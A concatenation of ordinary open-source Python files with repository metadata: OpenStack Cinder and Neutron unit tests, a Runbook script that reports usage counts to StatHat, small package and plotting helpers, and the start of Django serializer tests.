self.assertRaises(exception.BackupNotFound,
db.backup_get,
self.ctxt,
backup.id)
ctxt_read_deleted = context.get_admin_context('yes')
backup = db.backup_get(ctxt_read_deleted, backup.id)
self.assertEqual(True, backup.deleted)
self.assertGreaterEqual(timeutils.utcnow(), backup.deleted_at)
self.assertEqual('deleted', backup.status)
@mock.patch('cinder.volume.utils.notify_about_backup_usage')
def test_delete_backup_with_notify(self, notify):
"""Test normal backup deletion with notifications."""
vol_id = self._create_volume_db_entry(size=1)
backup = self._create_backup_db_entry(status='deleting',
volume_id=vol_id)
self.backup_mgr.delete_backup(self.ctxt, backup)
self.assertEqual(2, notify.call_count)
def test_list_backup(self):
backups = db.backup_get_all_by_project(self.ctxt, 'project1')
self.assertEqual(0, len(backups))
self._create_backup_db_entry()
b2 = self._create_backup_db_entry(project_id='project1')
backups = db.backup_get_all_by_project(self.ctxt, 'project1')
self.assertEqual(1, len(backups))
self.assertEqual(b2.id, backups[0].id)
def test_backup_get_all_by_project_with_deleted(self):
"""Test deleted backups.
Test deleted backups don't show up in backup_get_all_by_project.
Unless context.read_deleted is 'yes'.
"""
backups = db.backup_get_all_by_project(self.ctxt, 'fake')
self.assertEqual(0, len(backups))
backup_keep = self._create_backup_db_entry()
backup = self._create_backup_db_entry()
db.backup_destroy(self.ctxt, backup.id)
backups = db.backup_get_all_by_project(self.ctxt, 'fake')
self.assertEqual(1, len(backups))
self.assertEqual(backup_keep.id, backups[0].id)
ctxt_read_deleted = context.get_admin_context('yes')
backups = db.backup_get_all_by_project(ctxt_read_deleted, 'fake')
self.assertEqual(2, len(backups))
def test_backup_get_all_by_host_with_deleted(self):
"""Test deleted backups.
Test deleted backups don't show up in backup_get_all_by_project.
Unless context.read_deleted is 'yes'
"""
backups = db.backup_get_all_by_host(self.ctxt, 'testhost')
self.assertEqual(0, len(backups))
backup_keep = self._create_backup_db_entry()
backup = self._create_backup_db_entry()
db.backup_destroy(self.ctxt, backup.id)
backups = db.backup_get_all_by_host(self.ctxt, 'testhost')
self.assertEqual(1, len(backups))
self.assertEqual(backup_keep.id, backups[0].id)
ctxt_read_deleted = context.get_admin_context('yes')
backups = db.backup_get_all_by_host(ctxt_read_deleted, 'testhost')
self.assertEqual(2, len(backups))
def test_backup_manager_driver_name(self):
"""Test mapping between backup services and backup drivers."""
self.override_config('backup_driver', "cinder.backup.services.swift")
backup_mgr = \
importutils.import_object(CONF.backup_manager)
self.assertEqual('cinder.backup.drivers.swift',
backup_mgr.driver_name)
def test_export_record_with_bad_service(self):
"""Test error handling.
Test error handling when attempting an export of a backup
record with a different service to that used to create the backup.
"""
vol_id = self._create_volume_db_entry(size=1)
service = 'cinder.tests.backup.bad_service'
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id,
service=service)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.export_record,
self.ctxt,
backup)
def test_export_record_with_bad_backup_status(self):
"""Test error handling.
Test error handling when exporting a backup record with a backup
with a bad status.
"""
vol_id = self._create_volume_db_entry(status='available',
size=1)
backup = self._create_backup_db_entry(status='error',
volume_id=vol_id)
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.export_record,
self.ctxt,
backup)
def test_export_record(self):
"""Test normal backup record export."""
vol_size = 1
vol_id = self._create_volume_db_entry(status='available',
size=vol_size)
backup = self._create_backup_db_entry(status='available',
volume_id=vol_id)
export = self.backup_mgr.export_record(self.ctxt, backup)
self.assertEqual(CONF.backup_driver, export['backup_service'])
self.assertTrue('backup_url' in export)
def test_import_record_with_verify_not_implemented(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver does not support verify.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(vol_size=vol_size,
exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
def test_import_record_with_wrong_id(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver does not support verify.
"""
vol_size = 1
export = self._create_exported_record_entry(vol_size=vol_size)
imported_record = self._create_export_record_db_entry()
backup_hosts = []
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
def test_import_record_with_bad_service(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record with a different service to that used to create the backup.
"""
export = self._create_exported_record_entry()
export['backup_service'] = 'cinder.tests.unit.backup.bad_service'
imported_record = self._create_export_record_db_entry()
# Test the case where the additional hosts list is empty
backup_hosts = []
self.assertRaises(exception.ServiceNotFound,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
# Test that the import backup keeps calling other hosts to find a
# suitable host for the backup service
backup_hosts = ['fake1', 'fake2']
backup_hosts_expect = list(backup_hosts)
BackupAPI_import = 'cinder.backup.rpcapi.BackupAPI.import_record'
with mock.patch(BackupAPI_import) as _mock_backup_import:
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
next_host = backup_hosts_expect.pop()
_mock_backup_import.assert_called_once_with(
self.ctxt,
next_host,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts_expect)
def test_import_record_with_invalid_backup(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record where the backup driver returns an exception.
"""
export = self._create_exported_record_entry()
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_record_import_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'import_record'))
imported_record = self._create_export_record_db_entry()
backup_hosts = []
with mock.patch(_mock_record_import_class) as _mock_record_import:
_mock_record_import.side_effect = FakeBackupException('fake')
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
self.assertTrue(_mock_record_import.called)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('error', backup['status'])
def test_not_supported_driver_to_force_delete(self):
"""Test force delete check method for not supported drivers."""
self.override_config('backup_driver', 'cinder.backup.drivers.ceph')
self.backup_mgr = importutils.import_object(CONF.backup_manager)
result = self.backup_mgr.check_support_to_force_delete(self.ctxt)
self.assertFalse(result)
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_init_backup_repo_path', return_value=None)
@mock.patch('cinder.backup.drivers.nfs.NFSBackupDriver.'
'_check_configuration', return_value=None)
def test_check_support_to_force_delete(self, mock_check_configuration,
mock_init_backup_repo_path):
"""Test force delete check method for supported drivers."""
self.override_config('backup_driver', 'cinder.backup.drivers.nfs')
self.backup_mgr = importutils.import_object(CONF.backup_manager)
result = self.backup_mgr.check_support_to_force_delete(self.ctxt)
self.assertTrue(result)
def test_backup_has_dependent_backups(self):
"""Test backup has dependent backups.
Test the query of has_dependent_backups in backup object is correct.
"""
vol_size = 1
vol_id = self._create_volume_db_entry(size=vol_size)
backup = self._create_backup_db_entry(volume_id=vol_id)
self.assertFalse(backup.has_dependent_backups)
class BackupTestCaseWithVerify(BaseBackupTest):
"""Test Case for backups."""
def setUp(self):
self.override_config(
"backup_driver",
"cinder.tests.unit.backup.fake_service_with_verify")
super(BackupTestCaseWithVerify, self).setUp()
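    # With the fake verify-capable driver configured above, import_record and
    # reset_status go through the driver's verify() hook, which the tests
    # below patch to simulate success and failure.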
def test_import_record_with_verify(self):
"""Test normal backup record import.
Test the case when import succeeds for the case that the
driver implements verify.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(
vol_size=vol_size, exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class):
self.backup_mgr.import_record(self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('available', backup['status'])
self.assertEqual(vol_size, backup['size'])
def test_import_record_with_verify_invalid_backup(self):
"""Test error handling.
Test error handling when attempting an import of a backup
record where the backup driver returns an exception.
"""
vol_size = 1
backup_id = uuid.uuid4()
export = self._create_exported_record_entry(
vol_size=vol_size, exported_id=backup_id)
imported_record = self._create_export_record_db_entry(
backup_id=backup_id)
backup_hosts = []
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class) as _mock_record_verify:
_mock_record_verify.side_effect = \
exception.InvalidBackup(reason='fake')
self.assertRaises(exception.InvalidBackup,
self.backup_mgr.import_record,
self.ctxt,
imported_record,
export['backup_service'],
export['backup_url'],
backup_hosts)
self.assertTrue(_mock_record_verify.called)
backup = db.backup_get(self.ctxt, imported_record.id)
self.assertEqual('error', backup['status'])
def test_backup_reset_status_from_nonrestoring_to_available(
self):
vol_id = self._create_volume_db_entry(status='available',
size=1)
backup = self._create_backup_db_entry(status='error',
volume_id=vol_id)
with mock.patch.object(manager.BackupManager,
'_map_service_to_driver') as \
mock_map_service_to_driver:
mock_map_service_to_driver.return_value = \
fake_service.get_backup_driver(self.ctxt)
self.backup_mgr.reset_status(self.ctxt,
backup,
'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_backup_reset_status_to_available_invalid_backup(self):
volume = db.volume_create(self.ctxt, {'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='error',
volume_id=volume['id'])
backup_driver = self.backup_mgr.service.get_backup_driver(self.ctxt)
_mock_backup_verify_class = ('%s.%s.%s' %
(backup_driver.__module__,
backup_driver.__class__.__name__,
'verify'))
with mock.patch(_mock_backup_verify_class) as \
_mock_record_verify:
_mock_record_verify.side_effect = \
exception.BackupVerifyUnsupportedDriver(reason='fake')
self.assertRaises(exception.BackupVerifyUnsupportedDriver,
self.backup_mgr.reset_status,
self.ctxt,
backup,
'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('error', backup['status'])
def test_backup_reset_status_from_restoring_to_available(self):
volume = db.volume_create(self.ctxt,
{'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='restoring',
volume_id=volume['id'])
self.backup_mgr.reset_status(self.ctxt, backup, 'available')
backup = db.backup_get(self.ctxt, backup.id)
self.assertEqual('available', backup['status'])
def test_backup_reset_status_to_error(self):
volume = db.volume_create(self.ctxt,
{'status': 'available',
'host': 'test',
'provider_location': '',
'size': 1})
backup = self._create_backup_db_entry(status='creating',
volume_id=volume['id'])
self.backup_mgr.reset_status(self.ctxt, backup, 'error')
backup = db.backup_get(self.ctxt, backup['id'])
self.assertEqual('error', backup['status'])
@ddt.ddt
class BackupAPITestCase(BaseBackupTest):
def setUp(self):
super(BackupAPITestCase, self).setUp()
self.api = api.API()
def test_get_all_wrong_all_tenants_value(self):
self.assertRaises(exception.InvalidParameterValue,
self.api.get_all, self.ctxt, {'all_tenants': 'bad'})
@mock.patch.object(objects, 'BackupList')
def test_get_all_no_all_tenants_value(self, mock_backuplist):
result = self.api.get_all(self.ctxt, {'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
self.ctxt, self.ctxt.project_id, {'key': 'value'}, None, None,
None, None, None)
@mock.patch.object(objects, 'BackupList')
@ddt.data(False, 'false', '0', 0, 'no')
def test_get_all_false_value_all_tenants(
self, false_value, mock_backuplist):
result = self.api.get_all(self.ctxt, {'all_tenants': false_value,
'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
self.ctxt, self.ctxt.project_id, {'key': 'value'}, None, None,
None, None, None)
@mock.patch.object(objects, 'BackupList')
@ddt.data(True, 'true', '1', 1, 'yes')
def test_get_all_true_value_all_tenants(
self, true_value, mock_backuplist):
result = self.api.get_all(self.ctxt, {'all_tenants': true_value,
'key': 'value'})
self.assertFalse(mock_backuplist.get_all_by_project.called)
self.assertEqual(mock_backuplist.get_all.return_value,
result)
mock_backuplist.get_all.assert_called_once_with(
self.ctxt, {'key': 'value'}, None, None, None, None, None)
@mock.patch.object(objects, 'BackupList')
def test_get_all_true_value_all_tenants_non_admin(self, mock_backuplist):
ctxt = context.RequestContext('fake', 'fake')
result = self.api.get_all(ctxt, {'all_tenants': '1',
'key': 'value'})
self.assertFalse(mock_backuplist.get_all.called)
self.assertEqual(mock_backuplist.get_all_by_project.return_value,
result)
mock_backuplist.get_all_by_project.assert_called_once_with(
ctxt, ctxt.project_id, {'key': 'value'}, None, None, None, None,
None)
| {
"content_hash": "f39c18c2306ea04be9d9373e1b924994",
"timestamp": "",
"source": "github",
"line_count": 1150,
"max_line_length": 79,
"avg_line_length": 43.73478260869565,
"alnum_prop": 0.5538522715975743,
"repo_name": "Paul-Ezell/cinder-1",
"id": "6de7d0130bff6f36a46e66ce1ac9620b0f8a11ad",
"size": "50955",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "cinder/tests/unit/test_backup.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "13204008"
},
{
"name": "Shell",
"bytes": "8222"
}
],
"symlink_target": ""
} |
import mock
from oslo.config import cfg
from webob import exc as web_exc
import webtest
from neutron.api import extensions
from neutron.api.v2 import attributes
from neutron.api.v2 import router
from neutron import context
from neutron.extensions import providernet as pnet
from neutron.manager import NeutronManager
from neutron.openstack.common import uuidutils
from neutron import quota
from neutron.tests.unit import test_api_v2
from neutron.tests.unit import test_extensions
from neutron.tests.unit import testlib_api
class ProviderExtensionManager(object):
def get_resources(self):
return []
def get_actions(self):
return []
def get_request_extensions(self):
return []
def get_extended_resources(self, version):
return pnet.get_extended_resources(version)
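# ProvidernetExtensionTestCase mounts the API router on top of a mocked core
# plugin and verifies that provider attributes (network_type, physical_network,
# segmentation_id) are accepted for admin requests and rejected for non-admin
# ones.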
class ProvidernetExtensionTestCase(testlib_api.WebTestCase):
fmt = 'json'
def setUp(self):
super(ProvidernetExtensionTestCase, self).setUp()
plugin = 'neutron.neutron_plugin_base_v2.NeutronPluginBaseV2'
# Ensure existing ExtensionManager is not used
extensions.PluginAwareExtensionManager._instance = None
# Save the global RESOURCE_ATTRIBUTE_MAP
self.saved_attr_map = {}
for resource, attrs in attributes.RESOURCE_ATTRIBUTE_MAP.iteritems():
self.saved_attr_map[resource] = attrs.copy()
# Update the plugin and extensions path
self.setup_coreplugin(plugin)
cfg.CONF.set_override('allow_pagination', True)
cfg.CONF.set_override('allow_sorting', True)
self._plugin_patcher = mock.patch(plugin, autospec=True)
self.plugin = self._plugin_patcher.start()
# Ensure Quota checks never fail because of mock
instance = self.plugin.return_value
instance.get_networks_count.return_value = 1
# Instantiate mock plugin and enable the 'provider' extension
NeutronManager.get_plugin().supported_extension_aliases = (
["provider"])
ext_mgr = ProviderExtensionManager()
self.ext_mdw = test_extensions.setup_extensions_middleware(ext_mgr)
self.addCleanup(self._plugin_patcher.stop)
self.addCleanup(self._restore_attribute_map)
self.api = webtest.TestApp(router.APIRouter())
quota.QUOTAS._driver = None
cfg.CONF.set_override('quota_driver', 'neutron.quota.ConfDriver',
group='QUOTAS')
def _restore_attribute_map(self):
# Restore the global RESOURCE_ATTRIBUTE_MAP
attributes.RESOURCE_ATTRIBUTE_MAP = self.saved_attr_map
def _prepare_net_data(self):
return {'name': 'net1',
pnet.NETWORK_TYPE: 'sometype',
pnet.PHYSICAL_NETWORK: 'physnet',
pnet.SEGMENTATION_ID: 666}
def _put_network_with_provider_attrs(self, ctx, expect_errors=False):
data = self._prepare_net_data()
env = {'neutron.context': ctx}
instance = self.plugin.return_value
instance.get_network.return_value = {'tenant_id': ctx.tenant_id,
'shared': False}
net_id = uuidutils.generate_uuid()
res = self.api.put(test_api_v2._get_path('networks',
id=net_id,
fmt=self.fmt),
self.serialize({'network': data}),
extra_environ=env,
expect_errors=expect_errors)
return res, data, net_id
def _post_network_with_provider_attrs(self, ctx, expect_errors=False):
data = self._prepare_net_data()
env = {'neutron.context': ctx}
res = self.api.post(test_api_v2._get_path('networks', fmt=self.fmt),
self.serialize({'network': data}),
content_type='application/' + self.fmt,
extra_environ=env,
expect_errors=expect_errors)
return res, data
def test_network_create_with_provider_attrs(self):
ctx = context.get_admin_context()
ctx.tenant_id = 'an_admin'
res, data = self._post_network_with_provider_attrs(ctx)
instance = self.plugin.return_value
exp_input = {'network': data}
exp_input['network'].update({'admin_state_up': True,
'tenant_id': 'an_admin',
'shared': False})
instance.create_network.assert_called_with(mock.ANY,
network=exp_input)
self.assertEqual(res.status_int, web_exc.HTTPCreated.code)
def test_network_update_with_provider_attrs(self):
ctx = context.get_admin_context()
ctx.tenant_id = 'an_admin'
res, data, net_id = self._put_network_with_provider_attrs(ctx)
instance = self.plugin.return_value
exp_input = {'network': data}
instance.update_network.assert_called_with(mock.ANY,
net_id,
network=exp_input)
self.assertEqual(res.status_int, web_exc.HTTPOk.code)
def test_network_create_with_provider_attrs_noadmin_returns_403(self):
tenant_id = 'no_admin'
ctx = context.Context('', tenant_id, is_admin=False)
res, _1 = self._post_network_with_provider_attrs(ctx, True)
self.assertEqual(res.status_int, web_exc.HTTPForbidden.code)
def test_network_update_with_provider_attrs_noadmin_returns_404(self):
tenant_id = 'no_admin'
ctx = context.Context('', tenant_id, is_admin=False)
res, _1, _2 = self._put_network_with_provider_attrs(ctx, True)
self.assertEqual(res.status_int, web_exc.HTTPNotFound.code)
| {
"content_hash": "b8271a232535a736119fdc0281cf1d5e",
"timestamp": "",
"source": "github",
"line_count": 141,
"max_line_length": 77,
"avg_line_length": 41.6241134751773,
"alnum_prop": 0.6055546089623445,
"repo_name": "vijayendrabvs/hap",
"id": "d75cbfc2c81f525c36c1676c9114280df36fecd8",
"size": "6577",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/test_extension_pnet.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "8801288"
},
{
"name": "Shell",
"bytes": "8920"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
from geosupport.error import GeosupportError
from ..testcase import TestCase
class TestError(TestCase):
def test_error(self):
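        # Smoke test: constructing the error with an empty message must not raise.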
e = GeosupportError("")
| {
"content_hash": "6b64eaa628a8477ac06806c25d92eefb",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 44,
"avg_line_length": 20.625,
"alnum_prop": 0.7272727272727273,
"repo_name": "ishiland/python-geosupport",
"id": "638036322be66eb3712bdaf61aa069cf3ba6397c",
"size": "165",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/test_error.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "PowerShell",
"bytes": "4178"
},
{
"name": "Python",
"bytes": "39689"
}
],
"symlink_target": ""
} |
import sys
import yaml
import rethinkdb as r
from rethinkdb.errors import RqlDriverError, RqlRuntimeError
import requests
import json
import pprint
from runbookdb import RunbookDB
# Load Configuration
# ------------------------------------------------------------------
if len(sys.argv) < 2:
print("Hey, thats not how you launch this...")
print("%s <config file>") % sys.argv[0]
sys.exit(1)
configfile = sys.argv[1]
with open(configfile, 'r') as cfh:
config = yaml.safe_load(cfh)
# Open External Connections
# ------------------------------------------------------------------
# RethinkDB Server
# [DONE] TODO move default connection into module
db = RunbookDB(configfile)
conn = db.connect()
# Helper Functions
# ------------------------------------------------------------------
# Run For Loop
# ------------------------------------------------------------------
msg = {
"ezkey" : config['stathat_key'],
"data" : []
}
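# StatHat's EZ JSON API takes a single payload: the account "ezkey" plus a
# "data" list of {"stat": <name>, "value": <number>} entries, which is why the
# queries below only append to msg['data'] and the POST happens once at the end.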
# Get user count
try:
result = r.table('users').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Users" % config['envname'],
"value" : result
})
# Get upgraded user count and monitor count
try:
result = r.table('users').filter({'acttype': 'pro'}).run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
total_up_users = {
'monthly' : 0,
'yearly' : 0,
'total' : 0
}
total_up_mons = {
'monthly' : 0,
'yearly' : 0,
'total' : 0
}
for user in result:
total_up_users['total'] = total_up_users['total'] + 1
total_up_mons['total'] = total_up_mons['total'] + user['subplans']
if "monthly" in user['subscription']:
total_up_users['monthly'] = total_up_users['monthly'] + 1
total_up_mons['monthly'] = total_up_mons['monthly'] + user['subplans']
elif "yearly" in user['subscription']:
total_up_users['yearly'] = total_up_users['yearly'] + 1
total_up_mons['yearly'] = total_up_mons['yearly'] + user['subplans']
msg['data'].append({
'stat' : "[%s] Total Upgraded Users" % config['envname'],
"value" : total_up_users['total']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors" % config['envname'],
"value" : total_up_mons['total']
})
msg['data'].append({
'stat' : "[%s] Total Upgraded Users - Monthly Subscription" % config['envname'],
"value" : total_up_users['monthly']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors - Monthly Subscription" % config['envname'],
"value" : total_up_mons['monthly']
})
msg['data'].append({
'stat' : "[%s] Total Upgraded Users - Yearly Subscription" % config['envname'],
"value" : total_up_users['yearly']
})
msg['data'].append({
'stat' : "[%s] Total Purchased Monitors - Yearly Subscription" % config['envname'],
"value" : total_up_mons['yearly']
})
# Get monitor count
try:
result = r.table('monitors').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Monitors" % config['envname'],
"value" : result
})
# Get reaction count
try:
result = r.table('reactions').count().run(conn)
except (RqlDriverError, RqlRuntimeError) as e:
print("Got error while performing query: %s") % e.message
print("Exiting...")
sys.exit(1)
msg['data'].append({
'stat' : "[%s] Total Reactions" % config['envname'],
"value" : result
})
pprint.pprint(msg)
payload = json.dumps(msg)
headers = { 'Content-Type': 'application/json' }
req = requests.post(url="http://api.stathat.com/ez", headers=headers, data=payload)
if 200 <= req.status_code <= 299:
print("Successfully sent stats to stathat")
| {
"content_hash": "5ecbd704f82e861ed2ddfafb48e598ec",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 88,
"avg_line_length": 27.0472972972973,
"alnum_prop": 0.5903072695478391,
"repo_name": "madflojo/cloudroutes-service",
"id": "0f536f31a4a963949a0c1a418a4a7d22e5c9b95e",
"size": "4764",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "src/bridge/mgmtscripts/get_stats.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "17816"
},
{
"name": "HTML",
"bytes": "227943"
},
{
"name": "JavaScript",
"bytes": "3271"
},
{
"name": "Python",
"bytes": "678083"
},
{
"name": "Shell",
"bytes": "5859"
}
],
"symlink_target": ""
} |
"""
Package for working with quasar spectra
"""
from spectrum import WavelengthFunction, SpectralFluxDensity, Spectrum, read_combined_spectrum
from target import Target
import wavelength
from model import ContinuumModel
from paths import Paths
from continuum import MeanFluxContinuum, LinearFitContinuum
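# The public API is re-exported at package level so callers can reach the main
# entry points directly, e.g. qusp.Target or qusp.ContinuumModel.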
| {
"content_hash": "431926df73e8c0b1358c7c1435bdc0a8",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 94,
"avg_line_length": 23.692307692307693,
"alnum_prop": 0.8376623376623377,
"repo_name": "dmargala/qusp",
"id": "b520b7077594e3505c572adb3fce45b499d64aae",
"size": "308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qusp/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "181775"
},
{
"name": "Python",
"bytes": "89768"
}
],
"symlink_target": ""
} |
import numpy as np
from matplotlib import pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from ivf.cv.image import trim, alpha
class SubplotGrid:
def __init__(self, num_rows, num_cols, fig=None):
self._num_rows = num_rows
self._num_cols = num_cols
self._plot_id = 1
self._fig = fig
def showImage(self, image, title, alpha_clip=True, font_size=15):
plt.subplot(self._num_rows, self._num_cols, self._plot_id)
plt.title(title, fontsize=font_size)
if len(image.shape) == 2:
plt.gray()
show_image = image
if alpha_clip:
if len(image.shape) == 3:
if image.shape[2] == 4:
show_image = trim(image, alpha(image))
plt.imshow(show_image)
plt.axis('off')
self._plot_id += 1
def showColorMap(self, image, title, v_min=None, v_max=None, cmap=plt.cm.jet, with_colorbar=True):
ax = plt.subplot(self._num_rows, self._num_cols, self._plot_id)
plt.title(title)
image_plt = plt.imshow(image, cmap=cmap, vmin=v_min, vmax=v_max)
plt.axis('off')
if with_colorbar:
if self._fig is not None:
divider = make_axes_locatable(ax)
ax_cb = divider.new_horizontal(size="8%", pad=0.05)
self._fig.add_axes(ax_cb)
plt.colorbar(cax=ax_cb, ticks=[v_min, v_max])
else:
                if v_min is None:
                    v_min = np.min(image)
                if v_max is None:
                    v_max = np.max(image)
                plt.colorbar(ticks=[v_min, 0.5 * (v_min + v_max), v_max])
self._plot_id += 1
return image_plt
def showColorBar(self, image_plt):
plt.colorbar(image_plt)
self._plot_id += 1
def setPlot(self, row_id, col_id):
self._plot_id = self._num_cols * (row_id-1) + col_id
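# A minimal sketch of how SubplotGrid and the helpers below fit together
# (illustrative only; 'image' and 'error_map' are placeholder arrays):
#   createFigure("results")
#   grid = SubplotGrid(1, 2)
#   grid.showImage(image, "input")
#   grid.showColorMap(error_map, "error", v_min=0.0, v_max=1.0)
#   showMaximize()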
def createFigure(title, font_size=15):
fig, axes = plt.subplots(figsize=(11, 5))
fig.subplots_adjust(left=0.05, right=0.95, top=0.9, hspace=0.05, wspace=0.05)
fig.suptitle(title, fontsize=font_size)
## Maximize the matplot window.
def showMaximize():
mng = plt.get_current_fig_manager()
mng.window.state('zoomed')
plt.show()
| {
"content_hash": "7b42e524d79fbe1b5e194921f036c628",
"timestamp": "",
"source": "github",
"line_count": 70,
"max_line_length": 102,
"avg_line_length": 32.68571428571428,
"alnum_prop": 0.5598776223776224,
"repo_name": "tody411/ImageViewerFramework",
"id": "b2482a4f3baaba281cec1e836d1e58007d50ed58",
"size": "2420",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ivf/plot/window.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "GLSL",
"bytes": "8089"
},
{
"name": "Python",
"bytes": "337507"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import importlib
import json
import re
import unittest
from datetime import datetime
from xml.dom import minidom
from django.core import management, serializers
from django.db import connection, transaction
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipUnlessDBFeature,
)
from django.test.utils import Approximate
from django.utils import six
from django.utils.six import StringIO
from .models import (
Actor, Article, Author, AuthorProfile, Category, Movie, Player, Score,
Team,
)
try:
import yaml
HAS_YAML = True
except ImportError:
HAS_YAML = False
@override_settings(
SERIALIZATION_MODULES={
"json2": "django.core.serializers.json",
}
)
class SerializerRegistrationTests(SimpleTestCase):
def setUp(self):
self.old_serializers = serializers._serializers
serializers._serializers = {}
def tearDown(self):
serializers._serializers = self.old_serializers
def test_register(self):
"Registering a new serializer populates the full registry. Refs #14823"
serializers.register_serializer('json3', 'django.core.serializers.json')
public_formats = serializers.get_public_serializer_formats()
self.assertIn('json3', public_formats)
self.assertIn('json2', public_formats)
self.assertIn('xml', public_formats)
def test_unregister(self):
"Unregistering a serializer doesn't cause the registry to be repopulated. Refs #14823"
serializers.unregister_serializer('xml')
serializers.register_serializer('json3', 'django.core.serializers.json')
public_formats = serializers.get_public_serializer_formats()
self.assertNotIn('xml', public_formats)
self.assertIn('json3', public_formats)
def test_builtin_serializers(self):
"Requesting a list of serializer formats popuates the registry"
all_formats = set(serializers.get_serializer_formats())
public_formats = set(serializers.get_public_serializer_formats())
        self.assertIn('xml', all_formats)
self.assertIn('xml', public_formats)
self.assertIn('json2', all_formats)
self.assertIn('json2', public_formats)
self.assertIn('python', all_formats)
self.assertNotIn('python', public_formats)
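# SerializersTestBase is a format-agnostic mixin: concrete test cases such as
# XmlSerializerTestCase pair it with TestCase, set serializer_name, and supply
# the _validate_output/_get_field_values helpers for that format.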
class SerializersTestBase(object):
@staticmethod
def _comparison_value(value):
return value
def setUp(self):
sports = Category.objects.create(name="Sports")
music = Category.objects.create(name="Music")
op_ed = Category.objects.create(name="Op-Ed")
self.joe = Author.objects.create(name="Joe")
self.jane = Author.objects.create(name="Jane")
self.a1 = Article(
author=self.jane,
headline="Poker has no place on ESPN",
pub_date=datetime(2006, 6, 16, 11, 00)
)
self.a1.save()
self.a1.categories = [sports, op_ed]
self.a2 = Article(
author=self.joe,
headline="Time to reform copyright",
pub_date=datetime(2006, 6, 16, 13, 00, 11, 345)
)
self.a2.save()
self.a2.categories = [music, op_ed]
def test_serialize(self):
"""Tests that basic serialization works."""
serial_str = serializers.serialize(self.serializer_name,
Article.objects.all())
